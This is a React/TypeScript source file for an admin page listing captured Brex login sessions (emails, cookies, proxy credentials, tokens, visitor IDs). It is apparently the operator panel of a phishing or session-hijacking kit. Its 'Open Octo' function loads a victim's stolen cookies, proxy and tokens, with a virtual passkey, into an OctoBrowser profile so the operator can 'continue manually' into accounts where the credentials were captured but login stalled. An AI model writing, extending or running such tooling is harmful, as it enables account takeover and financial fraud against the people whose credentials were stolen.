import { useCallback, useEffect, useMemo, useState } from "react";
import { Navigate } from "react-router-dom";
import { api, type AppEvent, type PullAccount } from "../api";
import { useAuth } from "../auth/AuthContext";
import {
  authNonTokenAgeLabel,
  HideableEvent,
  isAuthNonTokenEvent,
  pullFromEvent,
  sortEventsNewestFirst,
  statusMeta,
} from "../components/AccountFeed";
import { EventDetailModal } from "../components/EventDetailModal";
import { useToast } from "../components/Toast";
import { isElectronDesktop } from "../desktop";
import { useLiveEvents } from "../hooks/useLiveEvents";
import { useLocalEventsQuery } from "../hooks/localEventsStore";
import { relativeTime } from "../lib/utils";

function proxyShort(proxy: PullAccount["proxy"]): string {
  if (!proxy) return "—";
  if (typeof proxy === "string") return proxy;
  const user = proxy.username ?? "";
  const pass = proxy.password ?? "";
  const auth = user || pass ? `${user}:${pass}@` : "";
  return `${proxy.protocol}://${auth}${proxy.host}:${proxy.port}`;
}

const FEED_OPTS = { limit: 2000, includeHidden: false } as const;

export function AuthNonTokenPage() {
  const { user, setAssignedKeys } = useAuth();
  const { push } = useToast();
  const desktop = isElectronDesktop();
  const [selected, setSelected] = useState<AppEvent | null>(null);
  const [filter, setFilter] = useState("");
  const [httpSeed, setHttpSeed] = useState<AppEvent[]>([]);
  const [seedError, setSeedError] = useState<string | null>(null);
  const [octoBusyId, setOctoBusyId] = useState<number | null>(null);
  const [nowMs, setNowMs] = useState(() => Date.now());
  const isAdmin = user?.role === "admin";

  useEffect(() => {
    const t = setInterval(() => setNowMs(Date.now()), 30_000);
    return () => clearInterval(t);
  }, []);

  const onAssignment = useCallback(
    (info: {
      resourceKey: string;
      message: string;
      assignedKeys: string[];
      events: AppEvent[];
    }) => {
      setAssignedKeys(info.assignedKeys);
      push(info.message, "ok");
    },
    [push, setAssignedKeys]
  );

  const onUnassignment = useCallback(
    (info: { resourceKey: string; message: string; assignedKeys: string[] }) => {
      setAssignedKeys(info.assignedKeys);
      push(info.message, "info");
    },
    [push, setAssignedKeys]
  );

  const { status, events: liveEvents, error: liveError } = useLiveEvents({
    enabled: Boolean(user) && isAdmin,
    onAssignment,
    onUnassignment,
  });
  const meta = statusMeta(status);

  const { events: localSeed } = useLocalEventsQuery(
    FEED_OPTS,
    Boolean(desktop && isAdmin)
  );

  useEffect(() => {
    if (!isAdmin || desktop) return;
    let cancelled = false;
    void api<{ logins: AppEvent[] }>("/api/data/logins?limit=500")
      .then((data) => {
        if (!cancelled) {
          setHttpSeed(data.logins || []);
          setSeedError(null);
        }
      })
      .catch((err) => {
        if (!cancelled) {
          setSeedError(err instanceof Error ? err.message : "Failed to load");
        }
      });
    return () => {
      cancelled = true;
    };
  }, [isAdmin, desktop]);

  const seed = desktop ? localSeed : httpSeed;

  const merged = useMemo(() => {
    const map = new Map<number, AppEvent>();
    for (const e of seed) map.set(e.id, e);
    for (const e of liveEvents) map.set(e.id, e);
    return [...map.values()];
  }, [seed, liveEvents]);

  const rows = useMemo(() => {
    const q = filter.trim().toLowerCase();
    return merged
      .filter((e) => isAuthNonTokenEvent(e, nowMs))
      .filter((e) => {
        if (!q) return true;
        const pull = pullFromEvent(e);
        const hay = [e.externalId, e.resourceKey, pull?.email, pull?.visitorId]
          .filter(Boolean)
          .join(" ")
          .toLowerCase();
        return hay.includes(q);
      })
      .sort(sortEventsNewestFirst);
  }, [merged, filter, nowMs]);

  const selectedLive = selected
    ? merged.find((e) => e.id === selected.id) || selected
    : null;

  async function openOcto(ev: AppEvent) {
    const pull = pullFromEvent(ev);
    if (!window.brexDesktop || !pull) return;
    if (!pull.cookies && !pull.proxy) {
      push("No cookies/proxy on this session yet", "error");
      return;
    }
    setOctoBusyId(ev.id);
    try {
      const result = await window.brexDesktop.openInOcto({
        title: pull.email || pull.id,
        cookies: pull.cookies,
        proxy: pull.proxy,
        token: pull.token,
        brexTokens: pull.brexTokens,
        hasToken: Boolean(pull.token?.trim() || pull.brexTokens?.accessToken),
        enablePasskey: true,
        passkeyId: pull.email || pull.id,
        startUrl:
          pull.token?.trim() || pull.brexTokens?.accessToken
            ? "https://dashboard.brex.com/"
            : "https://accounts.brex.com/",
      });
      if (result.ok) {
        const data = result.data as { passkeyAttached?: boolean };
        push(
          data?.passkeyAttached
            ? "Opened temporary OctoBrowser profile (virtual passkey)"
            : "Opened temporary OctoBrowser profile",
          "ok"
        );
      } else push(result.error, "error");
    } catch (err) {
      push(err instanceof Error ? err.message : "OctoBrowser failed", "error");
    } finally {
      setOctoBusyId(null);
    }
  }

  if (user && user.role !== "admin") return <Navigate to="/" replace />;

  return (
    <div className="page page-wide page-fill">
      <header className="page-header">
        <h1>Auth — Non-Token</h1>
        <div className="page-header-actions">
          <input
            className="search header-search"
            placeholder="Filter email, visitor…"
            value={filter}
            onChange={(e) => setFilter(e.target.value)}
          />
          <span className={`status-chip ${meta.className}`}>
            <span className="status-dot" />
            {meta.label}
          </span>
        </div>
      </header>

      <p className="muted tiny logins-blurb">
        Email + password for ≥10 minutes, still no dashboard bearer token (stalled
        email-verify / abandoned). Open in OctoBrowser with cookies + proxy to continue
        manually.
      </p>

      {(seedError || liveError) && (
        <div className="banner error">{seedError || liveError}</div>
      )}

      <div className="surface logins-table-wrap">
        <table className="logins-table">
          <thead>
            <tr>
              <th>Waiting</th>
              <th>Updated</th>
              <th>Email</th>
              <th>Cookies</th>
              <th>Proxy</th>
              <th>Visitor</th>
              <th></th>
            </tr>
          </thead>
          <tbody>
            {rows.length === 0 ? (
              <tr>
                <td colSpan={7} className="muted tiny" style={{ padding: "16px" }}>
                  None waiting — sessions under 10 minutes or already tokenized stay off
                  this list.
                </td>
              </tr>
            ) : (
              rows.map((ev) => {
                const pull = pullFromEvent(ev);
                return (
                  <HideableEvent key={ev.id} ev={ev} isAdmin>
                    <tr
                      className="logins-row"
                      onClick={() => setSelected(ev)}
                    >
                      <td>{authNonTokenAgeLabel(ev, nowMs)}</td>
                      <td>{relativeTime(ev.updatedAt)}</td>
                      <td className="mono">{pull?.email || "—"}</td>
                      <td>{pull?.cookies ? "yes" : "—"}</td>
                      <td className="mono tiny">{proxyShort(pull?.proxy)}</td>
                      <td className="mono tiny">
                        {(pull?.visitorId || "").slice(0, 10) || "—"}
                      </td>
                      <td onClick={(e) => e.stopPropagation()}>
                        {desktop ? (
                          <button
                            type="button"
                            className="btn compact"
                            disabled={
                              octoBusyId === ev.id || (!pull?.cookies && !pull?.proxy)
                            }
                            title={
                              !pull?.cookies && !pull?.proxy
                                ? "Need cookies or proxy"
                                : "Temporary Octo profile"
                            }
                            onClick={() => void openOcto(ev)}
                          >
                            {octoBusyId === ev.id ? "Opening…" : "Open Octo"}
                          </button>
                        ) : (
                          <span className="muted tiny">Desktop only</span>
                        )}
                      </td>
                    </tr>
                  </HideableEvent>
                );
              })
            )}
          </tbody>
        </table>
      </div>

      {selectedLive && (
        <EventDetailModal
          event={selectedLive}
          onClose={() => setSelected(null)}
        />
      )}
    </div>
  );
}
